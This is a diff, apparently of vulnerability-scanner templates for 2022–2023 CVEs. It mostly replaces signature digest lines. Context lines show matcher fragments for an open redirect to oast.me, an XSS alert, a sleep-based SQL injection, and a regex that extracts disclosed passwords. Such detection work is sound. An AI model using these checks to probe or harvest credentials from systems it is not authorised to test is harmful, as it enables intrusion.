-45,4 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022074c907eb4d6662a485c5cf6a20275f49eb358e805470537fa2dbc2bce50294bf022100ba0bf38c3ae8f7f5c83e2be6e7139d53450397f272542f5ab8fb570c876547cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dcb22e6c510cd8249b7da40e18ca2b37a495d6532ca3c7dc25c792c87a787e4f0221009b2ee3dc8e5dc4ccb06be4f0848082b21ddd75cb8c3bc3e91ace472f66cac295:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index eb8bab2b14..6553267523 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220200e122e6eeec45a80ae0d0335df320257e3e9c799280f827b9723b0103c57110221008ea2080e9b1a75447e165727409b6f4771777d8d18009062312e9b3cfc5838ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203a57686d800971e9c2d9e5c6af79ff460d57e595cc69bce08b60c90622d3b2c7022100a476ff76a56c7f5fba89e4a8a776f2e7e19a8c74054dfd44dbdf5404bf76a99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 4ea36a824f..406c627a59 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -133,4 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body -# digest: 4b0a00483046022100bee894518d0df5b4a5fb8ca9f0483c5c30d8820a121cd0c4cf47e5749e14e6b1022100891072b4407c52cbc62bfa211b7b3a2a4d05c4ccebf5731125a1a427cb36b9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e5e190acbf1701cb0513a17c27b6a5b7303c1fa2276a019790ce5daf06d82d20221009ca29bb2afc010a7a187729c866093da7d269789bdbb436773e3d2ddee285bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a5700101bc..7e6b439799 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -41,4 +41,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and -# digest: 4b0a00483046022100ed99835750f27c932a666b47b8ed34582dba5c25daf8c74117a8db9617cbf2b9022100b765f603c369d4027a97f08b675357a4d3f582d39d36c3c9d7b518960c0d05c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041a2e647421ab3a844ec1c371106d0ec3db2a0029f268b16732bfc3be590cd170221009c5847c2b2ce43c8f05a86525d82f698c4b917632335d94abd441ebbaab49947:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index e4d0b209bd..aa6fc64388 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071f74228b25467f72a73a0de7752856fcc91f8007aabe12243c65efd266c964e0221008b3834ed9625a3c5474e7bbd30bdd914c70c2d10bdf64aa7f607fa97cc50acd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d6af7c0ad168b3fb85272dc44681080e4a7ed2456efc19b6defc684e1a0562ff02210084e9b807f03f3273017b3a5fbc4d558ae8c2875b04f72515dabbe355a2818806:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 32c0b9aed8..43c09d75ef 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d49a19c38ab4b9a901abd5e6c90fef4882504cb73444882c2105d186ec64932022100ccca00e7eaba64835c620d5df47e2aad6ee450f81abf2f755260439020d500ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052802cfd25ee856c332eb660c66830c3689544bd7aba2b8ff4b1500de1e2027802200778be104007082ada0fc04e635bfe5324e1e1a495df93bd3c658b457c9cef64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index df7855cbc2..39976e87b5 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ae28ae8282c8eb129103ba15f2fd67f65c28194c70a1af8a99f9fc022671ca82022100b90c66835be66c887739e09bd92a805dd35a406549624e51b00d6219a27c7810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f15bdb646922e7f1f7fc7504fc102bf824f55de7f20ddefc2df4385247d6f2080220533beeebe11e9d490c154698a009f1b67a77f33a29366c378358d3bcfacdbcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 2b26609a94..4e02ca493e 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204866b4c509c48b1775499644d345df8c431567004b38f8674c3938f617ec6cb7022100f594663ec51fd629d1fb0e1dc42018110f37b87bf5cef07e0f83faeaf4b3acc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220081baa985fc1033d4ac4acecf70f0c6d36ebd6166ce094078b99c08d24143515022006d5ecfd03e07daaef2f30a3221a2fb37ca70d3bf0a7c34a95c71ffdbca43b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index 899d732f10..5ae2e1994a 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008687eab5b9874540b862eebf395db04e1b3280e879a414b6e83b1585e9630e3602210088fa6bef6acacfe1d08604f7b405bda69f1dbf7bd2a1b4fa178d4a2ce1fed6f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046cb66c855a26f79d49ac35934e0d4a2803899ae12afc6bdc9b7a73a129c639d022100925c6fa136fedd27f810c9e078540c040554272d25ad71db1ff179378902b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index f27b2580d7..edf8e1eff8 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -76,4 +76,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body -# digest: 4a0a00473045022100e3097e1250b20cab477464c81fac1ed317a7219c4e7a2c1a708487b21d40dd1d02202a1a5c6c96fb4cb4b010a4a7fc3023d770492fb35b2e1291eca3d007beb48c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4b5c77043fd58c33c2003e2800f45efaa99ac3907c021513ce8c19ba33741ad022054815969a3defdf9bd793eaab97d2b5d4f56ace691e5b463db543177a892d402:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index b0e61e055a..c3ff998c34 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -38,4 +38,4 @@ http: - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and -# digest: 4a0a0047304502210088fd6b3b11c7336d9211442a34460434445fbf2ed05f120310724e4f87057c8202207cd6f25b4bd701c32a7ecab0dfcb2a4c5ee230b2f1a4dba3370b976ea6c289f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038dc62b16bdae6d87b4226c574c3dcbc8829caf844c27d940adc6af39a52e4ac02210086ad3e6ad5d37a37b6310032f2db54f28b83ca7de6a55d8feb9cd2ba89c9d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 8f322aad70..232421323d 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e9ec553e489d577c4f95c9ab6a58c65d2697e33577bbeb887bdca3fdd7eb11c022100e65fc1ff00cfb250ace1c8561fd251745f59695c763eb6813cdb77a9ea6f7d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e97aad495112770ba4acb8126e83254747ceb8ff603eaa87925208d4e8d3890b0221008e6cfe1ab83fc37ab9c4670a4add34a9be5189dbb1adb8c487b34f2c345e31ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index b7cc1fbf5b..910a6fbdba 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100df8f921b60a2916578e9e578f153d97a1c3480c75e5a814cf8c4871e81a16a36022100f6bb590562d0bc593116e95316cb3160929015320ad42460f32a707e1b56b717:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed504b6bb2d73ae075772d8bbeef9388f102078b13b0c56eb81f740139a70eb8022100986d820b3bf728c892f1909f80ab0498e055aaa89b2c446f992b1c9073a4210d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 733f3c9c93..0b34a2dd6c 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 500 -# digest: 490a0046304402206656a0fc37b7f0312aac5169982c93b4aac3020a2f6b2467e912d8c9933b6e9d02203bf33f091982581911fac44f49b846db225def97cd5c8621957b4764b3a8dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201470d322dc6b0680a49f09870bcafdb0b02e4a95c1c5c66c5ce3738f6504e97b022100958fef932a5c251fc404ce725e6ae71ea58d6f4acab4a67b2415c49f5b2d4da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index 9eb86b1a78..97d973e7db 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450221008675f8d534749551dab1d522c3c1c441fc71faed4af70e415d9d1febd2fedada02201af48287edc494e68291e01b9138bfbedaf6d0d4719ce26de683a02197a2fa63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009865277077046199a9fd615bff84b7283df98ce4d3192205eaf8ee7ad69d739f022100f11cc68200e46913732ea7e9004ea292337844397be7504925a8221459e698df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 61a7b5fd56..85df6e54b5 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -56,4 +56,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and -# digest: 4a0a00473045022100bf1b87f270fb0aed2ab736915be3ec75e3b98c425a01af5211530e7e237f0416022028819402aebde09c1e9765f00d4697a0b9ed5af68ca77d5f46730f06ab241275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007b44ea4a13dae7e36848180fb7fabc80a68aa184664357712392ace77f407020220282032af57d8f021333f3c51dec5920fd7fb12c54d6a44a5c764ea12bc275502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index ccbc0f2b32..3003c654c1 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -60,4 +60,4 @@ http: - type: regex regex: - 'Password=([^\s]+)' -# digest: 4a0a00473045022100ad34103eba846a7940233f943b5f7f29ae6a400d2382dcd1de5d88c7a26f0b9d02203402a3e5e4630782bd667064414026e295dfe7892eae0210d7f9afcee667c501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056539b6cd3745e8d5dac980c0dfa0c22f75edcf4a24a9b1bf7f9c73769790efb02203bb9b12fdbd27068e9be86fb0334827b8bd8e30005b9a1c863645194cea28f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index 5871dedba4..2483354417 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200aa8dc45df93b31a509392bc137d444a730cbc113463d4d68a4cfb6d1e29e7b902202a7bcbef9175bddea3bf0e2803fecb56207e4961e90ae4011704631f27b92908:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d04ced5ba0c4a1ead607d2759900e2f98b0f90ec3fcc45243650dc4f3d072afc02203113a7fc6d68c59429fd448a03c3ff629e54408c1026d776db300c86b9951ff1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 4dc3cc0ba6..c8071ec09f 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "onload=alert(document.domain)")' - 'contains(body_2, "BackupBudddy iFrame")' condition: and -# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb17d717cfb49161b5dcc3386a53765abb55ebdc47feae0fb340a0a0e4e1f861022100d13e12abf5f2d7814125b0581f7bc28f5a444d5d6fdf66bfb32bc5989d271f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 0a29570785..c41dfea81e 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -50,4 +50,4 @@ http: - 'contains(body, "")' - 'contains(body_2, "search_term")' condition: and -# digest: 490a0046304402203b4a80a87f3d0e0dd7e3f72258762bb37aba818f7dbe6ac5028735d7fafe84000220687feef5645a29a70482987b64ca91f982de7c388a6de07865be17b5785e2de7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1e3263b6d6d0a0c9237713a1f7732ebd9b9d49e7f9807d85154d0f4831dbb6b02201fa389258a3890e6ff4642ec5ac60d8bb9b0983f1616cb00de1abd6824382ac0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index 3d15ba075e..40cff19ad2 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200389081a932ced2d9a9428eabc1ee2915f6f625fed573338636978dbcba058d0022100fa051ef2ac0253e86556778b0ce71fb678f577a2bfab19ae5d126ca0706da96f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf33c281aac014812de31f1d2e6ee14c6784d3b2360cfbbb3b77d83ada2102f4022100d98e1e4661863d6887d334c68f10ef2f737a295dcb0b074c45094f4b9aaadb7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index b001cae206..7ab571c47e 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009c218f291c5363beefd7ce01020284bf03b70918ba816b90527242a2167e5b85022014a99ea6fb8ea862e3d2983fa1fa38e7e3fc0e4d3cd8e49d315b0226c8027209:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d24028d90f855321d541394c206888ac3de32ddc95fd192f2cea84c3ce106573022100b06dfd2c7fe33e022d5bc25a563682c01a13c1ca7e839fe8ebbf28f79406baa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 883795acfc..ac6023e384 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Instructor Registration")' condition: and -# digest: 4b0a00483046022100daa47e8a4a0788475b79a18cbc1ad7c5a77b7eb596d483b673abb302bc1652560221008be0757737078d080d1fae62c765719987415565af3c11d18506449909548690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210086a85f95b8839d00d4ae004b419cb7a973cfadfb4410aad14e860aaebafec71302201091a4ba927a99a9ce115982e429f56111aa729bc688301748c19fd489652273:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index 43fd326232..26cafe16f6 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -60,4 +60,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a00483046022100e04d22e3c9f98a73a04f2df0ebc25a6f86b2441aab53abde2822f6c4307266d4022100f3582924ba72e0f4076d042a65eb28d5f6ab0a70b9094581c0591d602a8e30f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220400e7b76f4f4cf9870346fb29d8e654df2167790ed2d76301b8ba004db9ee11e022100be4e3edb0589d0c55d0484bf513363e3876baa53bd6c2a2fef65f79df30ae768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index d43bf8dfa8..0fd37658f8 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -41,4 +41,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "shortpixel") && contains(body, "")' condition: and -# digest: 4a0a0047304502203508d5e191b0f01786fb58c69f6f58561b03fb802660cf3d9897bc32149c97b6022100c2759cc2f8e2cd0d0da129288ab33ee23dadc2e8c4ee0e78c6d5d4591758c2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9fa2b52bf2536bca562c0635d3f1788a120768830a3f226cb798cd85b4ebae1022100f8a848371eb718d287123a0c59cecb3cf4a024ab502b1b0439593c39a5ff1cb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index b06b0d9466..561521dd45 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, ">")' - 'contains(body, "params\":{\"action")' condition: and -# digest: 4b0a004830460221008d8aa32338bfb7f81e502ff42a03d08e31ef3ea396eb9a3ff9fa31026dd6ff740221009f8879ac6a1bdfdfd7cf3db48ff44c8bf0a5022ef91619d357685c2211a6d58a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a13cd09bfd85cb1a4ee7a086824969d7b60e3a5f2d84190ce1f8084e3ed87810022100cfc834559b931faa279433809826cbadfa81aad7dd4882fb3ccc8d83fd7ff237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index a6397dc7fa..ae70c8708f 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Member Database")' condition: and -# digest: 490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090145a1d8a3b1ae8915299f67e45e0abb4418479ea20c08f4b7b58a17ca2af1902202d248fea2d26ef5d16477d20515ff55c93dab15e7dd7e33e38cc0d9cb35c93b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index bb322b34f6..d6736644a9 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -46,4 +46,4 @@ http: - 'contains(body, "")' - 'contains(body, "Online Security Gauard Hiring System |Search Request")' condition: and -# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a343a32d329fb055c3eb661448e738379aff505ebe733d9e4b567f04dc5ca39a02201abb22ff3473d17db6dd210c33705f9fadee48d87fe5298dbad7c057a203e6e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index b8a8f23572..ae4b45d10f 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fe4df23c800718a8fc1b6aa75d17660ea5e3ecbf9bad91b33e15202a629463302202dcd39f417726bda05249f40f18a86b6a265cf0b14853256096d0893e8f786d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index db415f56ad..ff557aadeb 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -47,4 +47,4 @@ http: - 'contains(body, "admin")' - 'contains(body, "BLMS | Dashboard")' condition: and -# digest: 4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eda3ead7dacde7dddd07bd8a1950d0fefc1b990044bde699bef31f4613c10192022052a24fd4127e20ddd0fabd69f9d7caf93a82ea337a5259ac2d1c24c44e023a8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 47c6487754..9d026d71d6 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -60,4 +60,4 @@ http: - 'status_code == 200' - 'contains(body, "sleep(6)")' condition: and -# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202861c8403d3eb479bb492712f393950224b00196285a91cabc26cfc6df23dd99022100f972e8f4e92362995d0226f6b20acfc5a5f63de38899b1d6a1df02dc0d6349db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index b4d0cd6150..20240647fe 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -45,4 +45,4 @@ http: - 'contains(header_2, "text/html")' - 'contains_all(body_2, "", "twittee")' condition: and -# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055eff03f7b91ce24bf430d5fbf23f913a168a32bf5a1496e975dfa16439e1f190220056c2da3cdd58f9d0da845fcbe25f11a4628f92ba076c2e00f56ed0331005d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index c9a9a6e5fd..3299a170aa 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -54,4 +54,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee61f22a1918e6a9198b81991818592c4981a6fabd8b5a895193a6dd70cc1528022100ec8b1623dc9206a446c7ae05f336e019ef9b53de9773c86a6a21cf25835b2d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index c12d836bf2..5a23d85203 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4c92d573b28770ca839e68e2b68d7a30ec2af40ff4abc64d9f4629681c70379022100c28548dd16e73ddb8f66ab1af4f4573c78c0681294fefe2136fcaa8f9b9ef758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index a3ecfa1573..e9fa8facd9 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -34,4 +34,4 @@ http: - 'contains_all(body, "Array", "[subnet]", "[description]")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022037ac3124b44bce6f30d38786c1118c28fe1a677e07b4d42f8793cdda1dccb40d022100e26f55f37eebb523a6dd288acef08e07981cd1298c176c6412d73f6be509d116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f9d5744f5ea518c0c15f7e8ae02484ba248121b2bb5f85fe63f693fc4a5968a602206e2279d5e1a12053e341f2e6f08fc0e01edee04ee85bd9a2a558592614c9a52c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index 067525648f..f57e933394 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -66,4 +66,4 @@ http: regex: - '_wpnonce=([0-9a-z]+)">Log Out' internal: true -# digest: 